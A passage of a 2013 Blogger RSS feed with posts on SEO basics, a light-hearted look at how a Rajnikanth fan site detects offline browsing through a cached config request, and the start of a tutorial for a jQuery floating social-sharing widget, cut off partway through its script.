&lt;span style="color: #444444; font-size: large;"&gt;Friends that's all for now and you can also download google's seo optimization guide &lt;a href="https://storage.googleapis.com/support-kms-prod/SNP_3027140_en_v0?utm_source=EN_IntBlog&amp;amp;utm_medium=bp&amp;amp;utm_campaign=q113os" target="_blank"&gt;here&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #444444;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #444444;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #444444;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #444444; font-size: large;"&gt;Thanks for your support...Like,comment and share.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #666666; font-size: large;"&gt;&lt;b&gt;____----Our hack is Yours----____&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #666666; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #666666; font-size: large;"&gt;&lt;b&gt;Your blogger&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://www.mylivesignature.com/" style="font-size: x-large;" target="_blank"&gt;&lt;img src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: transparent; border: 0 !important;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC-rDKZ0v5iNt3zcqfCEp3IUKS6upBskqoLchLGDZACujRj8o68e63XYJeM7FiJ9-kpaUi54Mkll9zm-kba50oDdXG0u1qDHagCUO_cAH4XHcGOmSyZqAGPjEGDvIWxGN733pUSqGg9Gcc/s72-c/SEO-tips+by+Google.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="355074" type="application/pdf" url="https://storage.googleapis.com/support-kms-prod/SNP_3027140_en_v0?utm_source=EN_IntBlog&amp;amp;utm_medium=bp&amp;amp;utm_campaign=q113os"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Blogging is more than just about creating an online space for yourself and putting up content there.You have to be the best in order to compete with the best.But even becomes less important when it comes to optimizing your blog for search engines. After all,you want your great content to reach your potential readers,right?Other wise,what's the point?This is the part where Search Engine Optimization(SEO) come in. In this post,I'll take you move on,make sure you've covered the following parts in our blogging series. Google Webmaster tools &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Google webmaster Tools is your friend! Whether you like Google oR not,you will have to sign up for Google Webmaster Tools(GWT).GWT is basically a dashboard wher you can not only get yourself verified as an official owner of your site,but also get access to a lot of tools,features,and reports.With GWT,you can change how GoOgLe sees your website,and even receive messages from Google regarding updates,and errors found on your website. with GWT,you can: View crawl errors,crawl stats,blocked url's index Fetch as Google - Pretty handy for fetching data for your website and submitting it to index to ensure that it's indexed more quickly. View search queries,and interenal/external links. Submitting sitemap. ...and much more. Submitting Sitemap &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; The first thing to do after making a proper website or blog is to create a sitemap,and submit it to Google.A sitemap is basically a listing of the contents of your blog,sort of like a table of contents.It needs to be submitted to search engines so they know what content to find on your blog.We recommend that you put up some content first before creating and submitting a sitemap.Around 10 posts on your blog should be enough to get you started. When you submit a sitemap,search engines use the data on that sitemap to locate your site and your data,and index it.You might have noticed that your site didn't appear on Google after you created it.Well,to get it into search results,Google first needs to index it.And to make Google index it soon,you submit a sitemap. To submit a sitemap,you first need a sitemap generator.For blogger blogs,you can use the tool on the following link. Blogger sitemap generator If you're using wordpress,the you just need a plugin called "Google XML Sitemaps".Either way,it's a simple process and only takes a few simple instructions. Keep monitoring your rank and statistics &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Now that you're a blogger and have started generating good content,it's time you should start monitoring your success.Keep track of your PageRank,which comes out every three month. The last one came in &amp;nbsp;February this year.You should also keep a check on your Alexa Toolbar ranking.For monitoring your website statistics,you should use Google Analytics. Friends that's all for now and you can also download google's seo optimization guide here Thanks for your support...Like,comment and share. ____----Our hack is Yours----____ Your blogger</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>Blogging is more than just about creating an online space for yourself and putting up content there.You have to be the best in order to compete with the best.But even becomes less important when it comes to optimizing your blog for search engines. After all,you want your great content to reach your potential readers,right?Other wise,what's the point?This is the part where Search Engine Optimization(SEO) come in. In this post,I'll take you move on,make sure you've covered the following parts in our blogging series. Google Webmaster tools &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Google webmaster Tools is your friend! Whether you like Google oR not,you will have to sign up for Google Webmaster Tools(GWT).GWT is basically a dashboard wher you can not only get yourself verified as an official owner of your site,but also get access to a lot of tools,features,and reports.With GWT,you can change how GoOgLe sees your website,and even receive messages from Google regarding updates,and errors found on your website. with GWT,you can: View crawl errors,crawl stats,blocked url's index Fetch as Google - Pretty handy for fetching data for your website and submitting it to index to ensure that it's indexed more quickly. View search queries,and interenal/external links. Submitting sitemap. ...and much more. Submitting Sitemap &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; The first thing to do after making a proper website or blog is to create a sitemap,and submit it to Google.A sitemap is basically a listing of the contents of your blog,sort of like a table of contents.It needs to be submitted to search engines so they know what content to find on your blog.We recommend that you put up some content first before creating and submitting a sitemap.Around 10 posts on your blog should be enough to get you started. When you submit a sitemap,search engines use the data on that sitemap to locate your site and your data,and index it.You might have noticed that your site didn't appear on Google after you created it.Well,to get it into search results,Google first needs to index it.And to make Google index it soon,you submit a sitemap. To submit a sitemap,you first need a sitemap generator.For blogger blogs,you can use the tool on the following link. Blogger sitemap generator If you're using wordpress,the you just need a plugin called "Google XML Sitemaps".Either way,it's a simple process and only takes a few simple instructions. Keep monitoring your rank and statistics &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Now that you're a blogger and have started generating good content,it's time you should start monitoring your success.Keep track of your PageRank,which comes out every three month. The last one came in &amp;nbsp;February this year.You should also keep a check on your Alexa Toolbar ranking.For monitoring your website statistics,you should use Google Analytics. Friends that's all for now and you can also download google's seo optimization guide here Thanks for your support...Like,comment and share. ____----Our hack is Yours----____ Your blogger</itunes:summary><itunes:keywords>TeCh</itunes:keywords></item><item><title>Rajnikanth's website secret revealed</title><link>https://snacksofhacks.blogspot.com/2013/05/rajnikanths-website-secret.html</link><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Tue, 7 May 2013 10:57:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-5407723171061513437</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: left;"&gt;
&lt;a href="http://www.takneek01.com/images/2012/01/Rajnikanth-website-message.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://www.takneek01.com/images/2012/01/Rajnikanth-website-message.png" width="196" /&gt;&lt;/a&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-family: Georgia, Times New Roman, serif;"&gt;Secret behind "&lt;a href="http://allaboutrajni.com/"&gt;allaboutrajni.com&lt;/a&gt;" ,Rajnikanth website revealed:&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;T&lt;/span&gt;&lt;span style="color: #999999; font-size: large;"&gt;he new website of rajnikanth "allaboutrajni.com" works only when you are not connected to the internet.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;It says that this website runs with rajni power but the secret behind this website is revealed common let's show off it to this open world:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;Now lets crack it,I mean lets find out how it is working:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #999999; font-size: large;"&gt;when you visit the site the site gets cached by the browser:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #999999; font-size: large;"&gt;To get started follow these procedure:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;1&lt;/span&gt;&lt;span style="color: #999999; font-size: large;"&gt;.Open "&lt;a href="http://www.allaboutrajni.com/"&gt;www.allaboutrajni.com&lt;/a&gt;" website and when it show remove your internet connection don't do anything.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;2&lt;/span&gt;&lt;span style="color: #999999; font-size: large;"&gt;.Open your browser's "developer console".&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;3&lt;/span&gt;&lt;span style="color: #999999; font-size: large;"&gt;.Navigate to network tab.&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;4&lt;/span&gt;&lt;span style="color: #999999; font-size: large;"&gt;.Click on header tab below...You can see the following code....&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;blockquote&gt;
&lt;div&gt;
Request URL:http://www.desimartini.com/allaboutrajniV1/config.xml?1174093192
Request Method:GET
Status Code:200 OK
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;Info: The code above is for sending a &lt;/span&gt;&lt;u style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: x-large; font-style: inherit;"&gt;Get request&lt;/u&gt;&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&amp;nbsp;to website.when the response is broken....it gets to know that we are not connected to the internet and then the cached website acts accordingly.&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: large;"&gt;If you click any one of the config.xml file displayed at the right side of the network tab you can see the code below:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div&gt;
"&lt;config&gt;
MACHA YOU ARE CRACKING IT BUT RAJNI SAYS - RASKALA
&lt;/config&gt;" 
&lt;/div&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #999999; font-family: Georgia, 'Times New Roman', serif; font-size: large; font-style: inherit;"&gt;Enjoy this site friends...&lt;/span&gt;&lt;/div&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: large;"&gt;Do comments and share this to your buddies:&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: x-large;"&gt;____----Our Hack Is Yours----____&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="color: #999999; font-family: Georgia, Times New Roman, serif; font-size: x-large;"&gt;Your Blogger&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="http://www.mylivesignature.com/" target="_blank"&gt;&lt;img src="http://signatures.mylivesignature.com/54491/59/BA5EF054215578AD968E7D6605217914.png" style="background: transparent; border: 0 !important;" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>New Floating Social Sharing Bar Widget for Blogger</title><link>https://snacksofhacks.blogspot.com/2013/02/new-floating-social-sharing-bar-widget.html</link><category>BlogGinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Mon, 25 Feb 2013 20:10:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-8533648989455925646</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: xx-large; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;h1 class="article-title entry-title" style="border: 0px; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 28px; line-height: 1.2; margin: 10px 0px 14px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;New Floating Social Sharing Bar Widget for Blogger&lt;/span&gt;&lt;/h1&gt;
&lt;br /&gt;
&lt;div style="background-color: white; border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: xx-large; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="font-size: x-large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; font-size: xx-large; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="background-color: white; border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQh5FHdVvZmqtA7q0MmeKWkN1pBUYYXkX0nsfvYJ4xX6v5hyphenhyphenv-256hXcxgNueM3elEf0OY7vtJdVOfriCx9212oY1nuyFnR9hxP88iG7GOkny471sRjPzVk94Idqaq6WPbTHp87GaxrQ/s1600/20130227-Figure4-ShareThis-ButtonStyles.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" data-original-height="210" data-original-width="450" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQh5FHdVvZmqtA7q0MmeKWkN1pBUYYXkX0nsfvYJ4xX6v5hyphenhyphenv-256hXcxgNueM3elEf0OY7vtJdVOfriCx9212oY1nuyFnR9hxP88iG7GOkny471sRjPzVk94Idqaq6WPbTHp87GaxrQ/s320/20130227-Figure4-ShareThis-ButtonStyles.jpg" width="320" /&gt;&lt;/a&gt;&lt;span style="background-color: transparent; font-size: x-large;"&gt;N&lt;/span&gt;ew Fixed / Floating Social sharing Horizontal Bar Widget for Blogger. This widget is requested by one of way2blogging reader, and thanks for requesting this new widget for you as well as for our Readers.&amp;nbsp;&lt;span style="font-family: inherit;"&gt;&lt;span style="font-style: inherit; font-variant: inherit; height: auto; line-height: inherit; width: auto;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;Coming to this widget, it is horizontal social sharing bar widget with counter and is displayed in above the post body. while you scrolling this horizontal social bar is fixed to the top of Post. which will give to readers to share the page immediately by the floating bar. This widget comes with&amp;nbsp;&lt;/span&gt;Twitter&lt;span style="background-color: white;"&gt;,&amp;nbsp;&lt;/span&gt;Facebook&lt;span style="background-color: white;"&gt;,&amp;nbsp;&lt;/span&gt;Google plus&lt;span style="background-color: white;"&gt;,&amp;nbsp;&lt;/span&gt;Pinterest&lt;span style="background-color: white;"&gt;, StumbleUpon and Digg buttons.&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit;"&gt;&lt;span id="more-304" style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="clear" style="border: 0px; clear: both; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; height: 1px; line-height: 22px; margin: 0px; padding: 0px; vertical-align: baseline; width: auto;"&gt;
&lt;/div&gt;
&lt;h4 style="border: 0px; color: #454545; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.6em; line-height: inherit; margin: 20px 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;LIVE PREVIEW&lt;/span&gt;&lt;/h4&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;a class="button widget-button" href="http://floatingsocialbar.blogspot.com/ncr/2012/06/sample-post-for-demo-blog.html" style="-webkit-box-shadow: rgb(249, 249, 249) 0px 1px 0px inset, rgba(223, 223, 223, 0.4) 1px 1px 1px; background-image: -webkit-linear-gradient(top, rgb(247, 248, 249) 0%, rgb(233, 233, 233) 100%); border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 1px solid rgb(221, 221, 221); box-shadow: rgb(249, 249, 249) 0px 1px 0px inset, rgba(223, 223, 223, 0.4) 1px 1px 1px; color: #3395bf; cursor: pointer; display: block; font-family: inherit; font-size: 18px; font-style: inherit; font-variant: inherit; font-weight: bold; line-height: 1.2; margin: 30px auto; padding: 8px 30px; text-align: center; text-shadow: rgb(255, 255, 255) 1px 1px 0px; text-transform: uppercase; vertical-align: baseline; width: 204px;" target="_blank"&gt;&lt;span style="background-color: white;"&gt;PREVIEW&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="-webkit-box-shadow: rgb(198, 198, 198) 0px 1px 3px, rgba(255, 255, 255, 0.4) 1px 1px 0px inset; background-image: url(https://turbo.way2blogging.org/wp-content/themes/way2blogging/images/h3.png); background-position: 4px 50%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 60px; border-bottom-right-radius: 60px; border-top-left-radius: 60px; border-top-right-radius: 60px; border: 3px solid rgb(200, 200, 0); box-shadow: rgb(198, 198, 198) 0px 1px 3px, rgba(255, 255, 255, 0.4) 1px 1px 0px inset; color: #a5a503; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 18px; line-height: 1; margin: 20px 3px; padding: 6px 10px 6px 30px; text-shadow: rgb(204, 204, 204) 0px 1px 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;HOW TO ADD FLOATING SOCIAL SHARING BAR WIDGET?&lt;/span&gt;&lt;/h3&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;First,&lt;/span&gt;&lt;/div&gt;
&lt;ol style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; list-style-image: initial; list-style-position: initial; margin: 10px 0px 20px 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;li style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: 1.4; margin: 0px 0px 10px 20px; padding: 0px; vertical-align: baseline;"&gt;&lt;span style="background-color: white;"&gt;Login to&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;New Blogger Dashboard&lt;/strong&gt;&amp;nbsp;&amp;gt; Choose your Blog and Click the&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;More Options&lt;/strong&gt;&amp;nbsp;Dropdown&lt;/span&gt;&lt;/li&gt;
&lt;li style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: 1.4; margin: 0px 0px 10px 20px; padding: 0px; vertical-align: baseline;"&gt;&lt;span style="background-color: white;"&gt;Select the&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Template&lt;/strong&gt;&amp;nbsp;&amp;gt; Click on&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Edit HTML&lt;/strong&gt;&amp;nbsp;&amp;gt;&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Proceed&lt;/strong&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: 1.4; margin: 0px 0px 10px 20px; padding: 0px; vertical-align: baseline;"&gt;&lt;span style="background-color: white;"&gt;Check/Tick the&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Expand Template Widgets&lt;/strong&gt;&amp;nbsp;checkbox&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;Just follow 3 Simple steps,&lt;/span&gt;&lt;/div&gt;
&lt;h4 style="border: 0px; color: #454545; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.6em; line-height: inherit; margin: 20px 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;THE JQUERY PLUGIN!&lt;/span&gt;&lt;/h4&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;As always, it is jQuery based widget, and your blog must have the jQuery plugin. if your blog already have a latest jQuery plugin, then&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Ignore this step&lt;/strong&gt;&amp;nbsp;and directly follow the&amp;nbsp;&lt;strong style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;Second step&lt;/strong&gt;.&lt;br /&gt;If not add the below snippet code before&amp;nbsp;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #111111; font-family: 'Courier New', monospace; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 1px 4px; vertical-align: baseline;"&gt;&amp;lt;/head&amp;gt;&lt;/code&gt;&amp;nbsp;tag&lt;/span&gt;&lt;/div&gt;
&lt;pre style="border: 2px solid rgb(255, 231, 175); clear: both; color: #333333; font-family: 'Courier New', monospace; font-size: 14px; line-height: 18px; margin: 25px 5px; overflow: auto; padding: 0px; vertical-align: baseline;"&gt;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #657b83; display: block; font-family: 'Courier New', monospace; font-size: 12px; font-style: inherit; font-variant: inherit; line-height: 1.6; margin: 0px; overflow: auto; padding: 10px !important; vertical-align: baseline; word-wrap: break-word;"&gt;&lt;span style="background-color: white;"&gt;&amp;lt;script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.js"&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h4 style="border: 0px; color: #454545; font-family: 'Myriad Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 1.6em; line-height: inherit; margin: 20px 0px; padding: 0px; text-transform: uppercase; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;THE SOCIAL SCRIPTS&lt;/span&gt;&lt;/h4&gt;
&lt;div style="border: 0px; color: #454545; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 22px; margin-bottom: 15px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="background-color: white;"&gt;This Code contains jQuery calls and Social button scripts and styles, and those are loads only in Post Pages which will decrease, load time when you on home or other pages.&amp;nbsp;&lt;span style="font-family: inherit;"&gt;&lt;span style="font-style: inherit; font-variant: inherit; height: auto; line-height: inherit; width: auto;"&gt;&lt;img alt=";)" class="wp-smiley" src="https://turbo.way2blogging.org/wp-includes/images/smilies/icon_wink.gif" style="border: 0px; font-family: inherit; font-style: inherit; font-variant: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 98%; padding: 0px; vertical-align: baseline; width: auto;" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Add the below snippet code before&amp;nbsp;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #111111; font-family: 'Courier New', monospace; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 1px 4px; vertical-align: baseline;"&gt;&amp;lt;/head&amp;gt;&lt;/code&gt;&amp;nbsp;tag&lt;/span&gt;&lt;/div&gt;
&lt;pre style="border: 2px solid rgb(255, 231, 175); clear: both; color: #333333; font-family: 'Courier New', monospace; font-size: 14px; line-height: 18px; margin: 25px 5px; overflow: auto; padding: 0px; vertical-align: baseline;"&gt;&lt;code style="border-bottom-left-radius: 2px; border-bottom-right-radius: 2px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 0px; color: #657b83; display: block; font-family: 'Courier New', monospace; font-size: 12px; font-style: inherit; font-variant: inherit; line-height: 1.6; margin: 0px; overflow: auto; padding: 10px !important; vertical-align: baseline; word-wrap: break-word;"&gt;&lt;span style="background-color: white;"&gt;&amp;lt;b:if cond='data:blog.pageType == &amp;amp;quot;item&amp;amp;quot;'&amp;gt;
&amp;lt;style type='text/css'&amp;gt;
/*&amp;lt;![CDATA[*/
 #w2bSocialFloat {clear:both;padding: 6px 0;display:block;background:#FFFFFF;}
 #w2bSocialFloat td{padding:4px;margin:0;border:none;}
 #w2bSocialFloat td iframe{max-width:82px;width:82px !important;}
 #w2bSocialFloat.w2bFloatSocial{position: fixed;top:0;z-index:9999999;border-bottom:1px solid #ccc;-webkit-box-shadow:0 1px 1px rgba(0,0,0,0.15);-moz-box-shadow:0 1px 1px rgba(0,0,0,0.15);box-shadow:0 1px 1px rgba(0,0,0,0.15);}
/*]]&amp;gt;*/
&amp;lt;/style&amp;gt;
&amp;lt;script type="text/javascript"&amp;gt;
/*&amp;lt;![CDATA[*/
// Set the Top Offset
$theOffset = 0;

